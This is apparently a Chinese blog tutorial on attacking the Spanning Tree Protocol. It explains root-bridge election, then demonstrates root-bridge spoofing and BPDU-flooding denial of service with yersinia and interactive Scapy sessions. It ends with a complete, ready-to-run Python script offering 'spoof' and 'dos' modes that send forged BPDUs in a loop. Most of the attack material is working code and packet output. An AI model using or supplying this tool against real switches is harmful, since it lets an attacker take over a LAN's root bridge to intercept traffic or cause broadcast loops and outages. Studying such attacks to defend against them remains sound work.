文章目录
STP
生成树协议(英语:Spanning Tree Protocol,STP),是一种工作在OSI网络模型中的第二层(数据链路层)的通信协议,基本应用是防止交换机冗余链路产生的环路.用于确保以太网中无环路的逻辑拓扑结构.从而避免了广播风暴,大量占用交换机的资源.
STP的工作过程如下:
- 首先进行根网桥的选举,不断发送BPDU,由
桥ID最小的为根桥 - 计算每个节点到根桥的距离,并由这些路径得到各冗余链路的代价,选择最小的成为通信路径(相应的端口状态变为forwarding),其它的就成为备份路径(相应的端口状态变为blocking)。
桥ID:
- 交换机设置的
优先级(bridge priority) - 交换机自身的
mac,越小优先级越高
优先级优先,优先级相同则比较mac
stp欺骗
发送网桥ID很低的精心设计的BPDU,就可以欺骗交换机,使它以为这是根网桥,这会导致STP重新收敛(reconverge),从而引起回路,导致网络崩溃。
stp dos攻击
利用假冒的BPDU数据来消耗交换机的资源,从而达到破坏网络环境的目的.
数据包抓包
需要配置有生成树的网络环境
利用yersinia工具进行STP攻击,进行抓包分析
STP欺骗
yersinia -G
交换机发出来的数据包
Scapy中Dot3对应的就是IEEE 802.3协议
Dot3
- src:
00:03:0f:91:06:73交换机mac - dst:
01-80-C2-00-00-00
链路层中01-80-C2-00-00-00多播地址
LLC
- dsap:
0x42 - ssap:
0x42
STP
- bridgeid:
0 - bridgemac:
00:03:0f:91:06:73交换机mac
攻击发出的包
发现对mac进行伪造,mac小于了交换机mac,成功了根桥的欺骗
STP
- bridgeid:
0 - bridgemac:
00:03:0f:90:06:73伪装的MAC
STP Dos
yersinia -G
抓包
随机生成一些字段
编写脚本
STP欺骗
1.抓取STP数据包,并获取当前根桥mac
sniff() :嗅探数据
sniff的帮助信息里面有这样一段
>>> help(sniff)
[...]
stop_filter: Python function applied to each packet to determine if
we have to stop the capture after this packet.
--Ex: stop_filter = lambda x: x.haslayer(TCP)
[...]
根据例子,可以得出这样的函数lambda x: x.haslayer(STP)
利用这个来抓取STP的数据包
>>> stp = STP()
>>> tcp = TCP()
>>> stp.haslayer(STP)
True
>>> tcp.haslayer(STP)
0
>>> sniff(stop_filter=lambda x: x.haslayer(STP),count=1)
<Sniffed: TCP:0 UDP:0 ICMP:0 Other:1>
提取根桥mac
>>> packet = sniff(stop_filter=lambda x: x.haslayer(STP),count=1)
>>> packet
<Sniffed: TCP:0 UDP:0 ICMP:0 Other:1>
>>> packet[-1]
<Dot3 dst=01:80:c2:00:00:00 src=00:03:0f:91:06:73 len=38 |<LLC dsap=0x42 ssap=0x42 ctrl=3 |<STP proto=0 version=0 bpdutype=0 bpduflags=0 rootid=0 rootmac=00:03:0f:91:06:73 pathcost=0 bridgeid=0 bridgemac=00:03:0f:91:06:73 portid=32769 age=0.0 maxage=20.0 hellotime=2.0 fwddelay=15.0 |<Padding load='\x00\x00\x00\x00\x00\x00\x00\x00' |>>>>
>>> stp = packet[-1].getlayer('STP')
>>> stp.fields['rootmac']
'00:03:0f:91:06:73'
2.发送stp欺骗数据包
查看数据包字段
>>> ls(STP)
proto : ShortField = (0)
version : ByteField = (0)
bpdutype : ByteField = (0)
bpduflags : ByteField = (0)
rootid : ShortField = (0)
rootmac : MACField = ('00:00:00:00:00:00')
pathcost : IntField = (0)
bridgeid : ShortField = (0)
bridgemac : MACField = ('00:00:00:00:00:00')
portid : ShortField = (0)
age : BCDFloatField = (1)
maxage : BCDFloatField = (20)
hellotime : BCDFloatField = (2)
fwddelay : BCDFloatField = (15)
构造数据包
>>> mac_new = '00:03:0f:90:06:73' #比交换机mac 00:03:0f:91:06:73小
>>> packet = Dot3(src=mac_new,dst='01:80:C2:00:00:00')/LLC()/STP(rootid=0,rootmac=mac_new,bridgeid=0,bridgemac=mac_new)
>>> packet.show()
###[ 802.3 ]###
dst= 01:80:C2:00:00:00
src= 00:03:0f:90:06:73
len= None
###[ LLC ]###
dsap= 0x42
ssap= 0x42
ctrl= 3
###[ Spanning Tree Protocol ]###
proto= 0
version= 0
bpdutype= 0
bpduflags= 0
rootid= 0
rootmac= 00:03:0f:90:06:73
pathcost= 0
bridgeid= 0
bridgemac= 00:03:0f:90:06:73
portid= 0
age= 1
maxage= 20
hellotime= 2
fwddelay= 15
3.发送包
>>> sendp(packet,loop=1)
........................................................................................................
[...]
发送前
发送后
STP Dos
1.随机优先级
优先级:
- 4096的倍数
- 0~61440
>>> id_list = []
>>> for i in range(9):id_list.append(i * 4096)
>>> id_list
[0, 4096, 8192, 12288, 16384, 20480, 24576, 28672, 32768]
>>> import random
>>> random.choice(id_list)
0
>>> random.choice(id_list)
4096
2.随机MAC
>>> print(RandMAC())
77:41:76:0c:6b:8f
>>> print(RandMAC())
8e:f4:f8:90:66:4d
完整代码
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
from scapy.all import (
Ether,
STP,
LLC,
sendp,
sniff,
RandMAC)
from random import choice
from argparse import ArgumentParser
import sys
mac_dst = '01:80:C2:00:00:00'
def bpdu_dos(iface):
id_list = []
for i in range(9):
id_list.append(i * 4096)
randmac = RandMAC()
ether = Ether(dst=mac_dst,src=randmac)/LLC()
stp = STP(rootid=choice(id_list),rootmac=randmac,bridgeid=choice(id_list),bridgemac=randmac)
pkt = ether/stp
sendp(pkt,iface=iface,loop=1)
def bpdu_spoof(iface):
mac_new = get_rootmac(iface)
while 1:
ether = Ether(dst=mac_dst,src=mac_new)/LLC()
stp = STP(rootid=0,rootmac=mac_new,bridgeid=0,bridgemac=mac_new)
pkt = ether/stp
sendp(pkt,iface=iface)
def get_rootmac(iface):
stp = sniff(stop_filter=lambda x: x.haslayer(STP),iface=iface,timeout=3,count=1)
if not stp:
print('[-]No stp packet')
sys.exit(1)
mac = stp.res[0].fields['src']
mac_list = mac.split(':')
mac_list[3] = hex(int(mac_list[3],16) - 1)[2:]
mac_new = ':'.join(mac_list)
return mac_new
def main():
usage = '%s [-i interface] [-m mode]'%(sys.argv[0])
parser = ArgumentParser(usage=usage)
parser.add_argument('-i','--iface',default='eth0',help='The network interface of use')
parser.add_argument('-m','--mode',required=True,help='[spoof]:The BPDU Root Roles attack [dos]:The BPDU Dos attack')
args = parser.parse_args()
iface = args.iface
attack = args.mode
try:
if attack == 'spoof':
bpdu_spoof(iface)
elif attack == 'dos':
bpdu_dos(iface)
else:
parser.print_help()
except KeyboardInterrupt:
print('\n[+] Stopped sending')
except ValueError: # 捕获输入参数错误
parser.print_help()
if __name__ == '__main__':
main()
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。